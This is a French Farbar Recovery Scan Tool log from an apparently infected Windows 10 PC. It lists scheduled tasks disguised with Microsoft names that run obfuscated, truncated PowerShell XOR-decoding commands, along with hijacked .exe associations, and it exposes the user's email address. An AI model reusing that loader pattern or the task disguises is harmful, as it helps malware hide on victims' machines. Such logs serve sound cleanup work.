cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation

Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x86) Version: 11-12-2017
Exécuté par Zahra (12-12-2017 15:10:24)
Exécuté depuis C:\Users\Zahra\Desktop
Microsoft Windows 10 Professionnel Version 1703 15063.726 (X86) (2017-07-16 11:53:11)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-2149384820-406478696-3599574708-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2149384820-406478696-3599574708-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2149384820-406478696-3599574708-1004 - Limited - Enabled)
Invité (S-1-5-21-2149384820-406478696-3599574708-501 - Limited - Disabled)
Zahra (S-1-5-21-2149384820-406478696-3599574708-1000 - Administrator - Enabled) => C:\Users\Zahra

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

Adobe Acrobat Reader DC - Français (HKLM\...\{AC76BA86-7AD7-1036-7B44-AC0F074E4100}) (Version: 18.009.20050 - Adobe Systems Incorporated)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.5.3.9120 - Adobe Systems Inc.)
Adobe Flash Player 27 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Photoshop CS5 (HKLM\...\{15FEDA5F-141C-4127-8D7E-B962D1742728}) (Version: 12.0 - Adobe Systems Incorporated)
Assistant Mise à jour de Windows 10 (HKLM\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Athan Basic 4.5 (HKLM\...\Athan) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.37 - Piriform)
D3DX10 (HKLM\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.6.0.0275 - Disc Soft Ltd)
DAMN NFO Viewer 2.10.0031 RC3 (HKLM\...\{DA5E6A2D-DEAA-4152-A43A-FDBDE29AA724}) (Version: 2.10.0031 - DAMN)
Google Chrome (HKLM\...\Google Chrome) (Version: 63.0.3239.84 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{18455581-E099-4BA8-BC6B-F34B2F06600C}) (Version: 1.0.0 - Google Inc.) Hidden
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
HP Deskjet 1050 J410 series Aide (HKLM\...\{5C90D8CF-F12A-41C6-9007-3B651A1F0D78}) (Version: 140.0.66.66 - Hewlett Packard)
HPDiagnosticAlert (HKLM\...\{B6465A32-8BE9-4B38-ADC5-4B4BDDC10B0D}) (Version: 1.00.0001 - Microsoft) Hidden
Immortal Love 2 - The Price of a Miracle Collectors Edition (HKLM\...\Immortal Love 2 - The Price of a Miracle Collect~26E39BF5_is1) (Version: - )
Intel(R) Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2509 - Intel Corporation)
Internet Mobile (HKLM\...\Internet Mobile) (Version: 23.009.09.00.162 - Huawei Technologies Co.,Ltd)
Java 8 Update 151 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
LibreOffice 5.0 Help Pack (French) (HKLM\...\{398248CC-6595-4E12-A18A-7BDAC77C36B2}) (Version: 5.0.6.3 - The Document Foundation)
LibreOffice 5.2.7.2 (HKLM\...\{C89BB248-1889-4D6B-B310-A744A0545123}) (Version: 5.2.7.2 - The Document Foundation)
Logiciel de base du périphérique HP Deskjet 1050 J410 series (HKLM\...\{F082A75C-5B40-445D-9A71-3CD797534497}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
MEDIADICO - Barre d’outils 3.0 (HKLM\...\{67E131AF-6F62-4091-9567-55DE59130825}) (Version: 3.0.0 - L'Aventure)
MEDIADICO pour votre PC (HKLM\...\{BA9F5A23-5123-42CD-9433-F0F144B97219}) (Version: 1.0.0 - LAventure)
Micro Application - MediaDICO (HKLM\...\MediaDICO) (Version: - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-0081-040C-0000-0000000FF1CE}) (Version: 14.0.6123.5001 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mise à jour Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-040C-0000-0000000FF1CE}_PROPLUS_{B761869A-B85C-40E2-994C-A1CE78AC8F2C}) (Version: - Microsoft)
Mise à jour Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-040C-0000-0000000FF1CE}_PROPLUS_{51EFB347-1F3D-4BAC-8B79-F056B904FE21}) (Version: - Microsoft)
Mise à jour Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-040C-0000-0000000FF1CE}_PROPLUS_{C3DCA38E-005E-41BA-A52A-7C3429F351C3}) (Version: - Microsoft)
Mise à jour Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-040C-0000-0000000FF1CE}_PROPLUS_{81536A04-DBFB-4DB3-978F-0F284590C223}) (Version: - Microsoft)
PDF Settings CS5 (HKLM\...\{A78FE97A-C0C8-49CE-89D0-EDD524A17392}) (Version: 10.0 - Adobe Systems Incorporated) Hidden
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Samsung Kies (HKLM\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Skype Click to Call (HKLM\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Synaptics TouchPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft)
Windows 10 Update and Privacy Settings (HKLM\...\{542CC2C2-ABAF-4604-8723-DA296AF74540}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows Live (HKLM\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
WinRAR 5.40 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

CustomCLSID: HKU\S-1-5-21-2149384820-406478696-3599574708-1000_Classes\CLSID\{A10E0335-AFCA-4E7E-975F-CA30235FB29A}\InprocServer32 -> C:\Users\Zahra\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> [CC]{4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Pas de fichier
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> [CC]{4838CD50-7E5D-4811-9B17-C47A85539F28} => -> Pas de fichier
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> [CC]{4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> Pas de fichier
ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Pas de fichier
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)

==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {04E44EB5-3B79-49BA-9147-5E9C7A68C565} - System32\Tasks\SidebarExecute => C:\Program Files\Windows Sidebar\sidebar.exe
Task: {0A5241D3-29E3-40DE-B16A-76DBB7BBCFB5} - System32\Tasks\Java Update Scheduler => C:\Program Files\Common Files\Java\Java Update\jusched.exe [2017-09-05] (Oracle Corporation)
Task: {12BEFD02-7552-4B81-BA80-2C29ED9F5A16} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-11-08] (Piriform Ltd)
Task: {18FDD6B5-B115-4189-A912-6F525E94176F} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-zahra_klein@hotmail.com => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {212C02AB-E656-4E68-94CF-93AC34F9D6ED} - System32\Tasks\{8C646B6E-F91B-45FB-A529-81E6DF6424F8} => "c:\program files\internet explorer\iexplore.exe" hxxp://ui.skype.com/ui/0/6.3.73.105.457/fr/abandoninstall?page=tsMain
Task: {247BD142-0549-4E91-84B0-172C25563718} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {24DF0337-4AA0-4270-AD06-C6E79053BFFE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-03-14] (Google Inc.)
Task: {2802A5A2-3D34-46A0-9771-27B277EE6196} - System32\Tasks\Microsoft\Windows\SettingSync\SettingSync => powershell -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskd (l'élément de données a 2765 caractères en plus).
Task: {3360AF1B-CCC4-47EF-883A-981563E89901} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {33ABFC4F-11F8-4722-8836-E41233793D10} - System32\Tasks\Programme de mise à jour en ligne de Adobe => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {4EC9AA7D-1261-4B7D-9162-BD261BC8C980} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-11-17] (Microsoft Corporation)
Task: {5332DA33-EB4A-422A-B52B-1C69AD7556C2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2017-03-14] (Google Inc.)
Task: {60E424B1-846C-4DF1-8443-B1309D0A5247} - System32\Tasks\Microsoft\Windows\Maps\Maps => powershell -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskd (l'élément de données a 2765 caractères en plus).
Task: {8AE5662B-41E0-40AC-A3AE-3BBD63440790} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\Explorer.Exe /NOUACCHECK
Task: {A0294294-9D2A-40C5-B451-430CD68FBD11} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2017-11-08] (Piriform Ltd)
Task: {B95C1403-1475-4EEB-A9E8-D7AF0DAF373A} - System32\Tasks\WindowsUpda2ta => C:\Users\Zahra\AppData\Local\Temp\Update.js [2015-10-25] () <==== ATTENTION
Task: {CE8575FE-C4A6-4E8D-A246-E4EB66E3A88D} - System32\Tasks\AdobeAAMUpdater-1.0-PCdeZahra-Zahra => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {D9BDF1DF-CA0D-4A19-95C5-160626CB22F3} - \GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-2149384820-406478696-3599574708-1000 -> Pas de fichier <==== ATTENTION
Task: {DA53FBEB-32A9-4CB5-96CB-DD441B4608A8} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-11-15] (Adobe Systems Incorporated)
Task: {E4910C0E-EED3-4BAC-ADE5-935773CCFB98} - System32\Tasks\IntelDManager => C:\Program Files\Common Files\IntelD\IntelD.exe [2017-05-07] ()
Task: {E4B39A80-3B91-40B8-A0B8-143C364BD23D} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHost => powershell -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskd (l'élément de données a 2765 caractères en plus).

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)


==================== Raccourcis & WMI ========================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)


Shortcut: C:\Users\Zahra\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OmegaSeeder 2.0\Visit OmegaSeeder website.lnk -> hxxp://www.omegaseeder.com

==================== Modules chargés (Avec liste blanche) ==============

2011-03-14 15:27 - 2011-03-14 15:27 - 000271712 _____ () C:\ProgramData\DatacardService\HWDeviceService.exe
2014-01-17 18:43 - 2012-11-12 05:59 - 000657504 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\ouc.exe
2014-01-17 18:43 - 2009-01-10 18:32 - 000011362 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\mingwm10.dll
2014-01-17 18:43 - 2009-06-23 02:42 - 000043008 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\libgcc_s_dw2-1.dll
2014-01-17 18:43 - 2012-10-31 09:14 - 001148416 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\QtNetwork4.dll
2014-01-17 18:43 - 2012-10-31 09:11 - 002417152 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\QtCore4.dll
2014-01-17 18:43 - 2012-11-12 03:48 - 000843264 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\QueryStrategy.dll
2014-01-17 18:43 - 2012-10-31 09:11 - 000398336 _____ () C:\ProgramData\Internet Mobile\OnlineUpdate\QtXml4.dll
2017-03-18 18:19 - 2017-03-18 18:19 - 000116824 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 18:19 - 2017-03-19 08:22 - 001456128 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-12-12 08:59 - 2017-12-12 09:00 - 000075264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.10.572.0_x86__kzf8qxf38zg5c\SkypeHost.exe
2017-12-12 08:59 - 2017-12-12 09:00 - 000166400 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.10.572.0_x86__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-12-12 08:59 - 2017-12-12 09:00 - 017771008 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.10.572.0_x86__kzf8qxf38zg5c\SkyWrap.dll
2017-12-12 08:59 - 2017-12-12 09:00 - 001789440 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.10.572.0_x86__kzf8qxf38zg5c\skypert.dll
2004-12-25 10:37 - 2004-12-25 10:37 - 000258121 _____ () C:\Program Files\Athan\vbh.dll
2010-03-08 19:08 - 2010-03-08 19:08 - 000282697 _____ () C:\Program Files\Athan\vbp.dll
2004-03-20 11:49 - 2004-03-20 11:49 - 000229444 _____ () C:\Program Files\Athan\vbq.dll

==================== Alternate Data Streams (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)

AlternateDataStreams: C:\ProgramData\TEMP:737160C1 [111]
AlternateDataStreams: C:\ProgramData\TEMP:C9C13817 [112]

==================== Mode sans échec (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)


==================== Association (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)

HKU\S-1-5-21-2149384820-406478696-3599574708-1000\Software\Classes\exefile: <==== ATTENTION
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\Software\Classes\.exe: => <==== ATTENTION

==================== Internet Explorer sites de confiance/sensibles ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)


==================== Hosts contenu: ===============================

(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)

2013-08-22 06:13 - 2015-10-20 19:30 - 000000826 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Autres zones ============================

(Actuellement, il n'y a pas de correction automatique pour cette section.)

HKU\S-1-5-21-2149384820-406478696-3599574708-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Zahra\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\chevres-1_a.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Le Pare-feu est activé.

==================== MSCONFIG/TASK MANAGER éléments désactivés ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: ALCATEL => 2
MSCONFIG\Services: AtherosSvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: RealPlayer Cloud Service => 2
MSCONFIG\Services: RealPlayerUpdateSvc => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SwitchBoard => 3
HKLM\...\StartupApproved\StartupFolder: => "RealPlayer Cloud Service UI.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WinZip Préchargeur.lnk"
HKLM\...\StartupApproved\StartupFolder: => "FAH.lnk"
HKLM\...\StartupApproved\Run: => "RTHDVCPL"
HKLM\...\StartupApproved\Run: => "RtHDVBg"
HKLM\...\StartupApproved\Run: => "MessengerPlusForSkypeService"
HKLM\...\StartupApproved\Run: => "PlusService"
HKLM\...\StartupApproved\Run: => "SynTPEnh"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "Persistence"
HKLM\...\StartupApproved\Run: => "SSBkgdUpdate"
HKLM\...\StartupApproved\Run: => "WrtMon.exe"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "SwitchBoard"
HKLM\...\StartupApproved\Run: => "AdobeCS5ServiceManager"
HKLM\...\StartupApproved\Run: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run: => "Adobe ARM"
HKLM\...\StartupApproved\Run: => "TkBellExe"
HKLM\...\StartupApproved\Run: => "HP Software Update"
HKLM\...\StartupApproved\Run: => "WinZip PreLoader"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\StartupFolder: => "MSN Pictures Displayer.lnk"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\StartupFolder: => "Alertes de surveillance de l'encre - HP Deskjet 1050 J410 series (Copie 1).lnk"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "AdobeBridge"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "FreeCoinsStartup"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "FreeCoinsUpdater"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2149384820-406478696-3599574708-1000\...\StartupApproved\Run: => "OneNote"

==================== RèglesPare-feu (Avec liste blanche) ===============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

FirewallRules: [{7F54E12C-63BA-48B3-AB40-15CC34C3BC10}] => (Allow) %ProgramFiles%\Google\Chrome\Application\chrome.exe
FirewallRules: [{0277A7A8-DBD3-4EBE-ACFC-E5630CBB7BF3}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [{F48A2757-BE97-4C93-9510-8DFE506EEAAC}] => (Allow) %systemroot%\system32\alg.exe
FirewallRules: [UDP Query User{54E4DE98-C323-41DB-BA75-EC310A452C6B}C:\program files\skype\phone\skype.exe] => (Block) C:\program files\skype\phone\skype.exe
FirewallRules: [TCP Query User{8EA94162-06D0-409C-9F35-EF7579504A1F}C:\program files\skype\phone\skype.exe] => (Block) C:\program files\skype\phone\skype.exe
FirewallRules: [{A6489324-87D9-48BF-A1D6-2825370A6D0D}] => (Allow) C:\Program Files\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{4F9F522C-21AF-4F3F-A07E-D3B60F4BCE15}] => (Allow) LPort=2869
FirewallRules: [{C08E6F7F-4587-463C-823B-E38F4D32DBAC}] => (Allow) LPort=1900
FirewallRules: [{1EEC6BC6-4E4D-4EE3-8129-0930075844A5}] => (Allow) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{61ACAFEB-C52E-45FD-8753-D8755AB27C8F}] => (Allow) C:\Windows\System32\muzapp.exe
FirewallRules: [{A45B6104-9CAC-480C-8F44-7701FF70A22E}] => (Allow) C:\Windows\System32\muzapp.exe
FirewallRules: [{4F02AC12-8634-4132-9D87-89F871A49482}] => (Allow) c:\program files\real\realplayer\RPDS\Bin\rpdsvc.exe
FirewallRules: [{E795BB34-237B-46DD-85B9-F61D73F70F24}] => (Allow) LPort=11949
FirewallRules: [TCP Query User{8B68ED42-111B-4DAC-B95D-2109F250A3D4}C:\program files\emule\emule.exe] => (Allow) C:\program files\emule\emule.exe
FirewallRules: [UDP Query User{D4D6BE10-AC26-431E-BEF4-2E35E83B0E48}C:\program files\emule\emule.exe] => (Allow) C:\program files\emule\emule.exe
FirewallRules: [{63BFBE34-B385-485E-A45F-11B8F9E7D3ED}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Points de restauration =========================

26-11-2017 19:00:40 Sauvegarde Windows
03-12-2017 19:00:59 Sauvegarde Windows
05-12-2017 16:34:00 F-Secure malware removal
09-12-2017 16:06:36 Removed Skype™ 7.40
10-12-2017 19:00:36 Sauvegarde Windows

==================== Éléments en erreur du Gestionnaire de périphériques =============


==================== Erreurs du Journal des événements: =========================

Erreurs Application:
==================
Error: (12/12/2017 11:09:30 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Échec de la procédure d’ouverture pour le service « BITS » dans la DLL « C:\Windows\System32\bitsperf.dll ». Les données de performance de ce service ne seront pas disponibles. Le premier mot (DWORD) de la section Données contient le code d’erreur.

Error: (12/11/2017 04:58:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: PCDEZAHRA)
Description: Échec de l’activation de l’application Microsoft.SkypeApp_kzf8qxf38zg5c!App avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.

Error: (12/11/2017 04:58:38 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: PCDEZAHRA)
Description: Échec de l’activation de l’application Microsoft.SkypeApp_kzf8qxf38zg5c!App avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.

Error: (12/10/2017 07:11:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddWin32ServiceFiles: Unable to back up image of service Service utilisateur de notifications Push Windows_358bcf8 since OpenService API failed

System Error:
Le service spécifié n’existe pas en tant que service installé.
.

Error: (12/10/2017 07:11:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddWin32ServiceFiles: Unable to back up image of service MessagingService_358bcf8 since OpenService API failed

System Error:
Le service spécifié n’existe pas en tant que service installé.
.

Error: (12/10/2017 07:11:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddWin32ServiceFiles: Unable to back up image of service Flux d’appareils_358bcf8 since OpenService API failed

System Error:
Le service spécifié n’existe pas en tant que service installé.
.

Error: (12/10/2017 07:11:09 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.

System Error:
Accès refusé.
.

Error: (12/10/2017 07:10:17 PM) (Source: Windows Backup) (EventID: 4104) (User: )
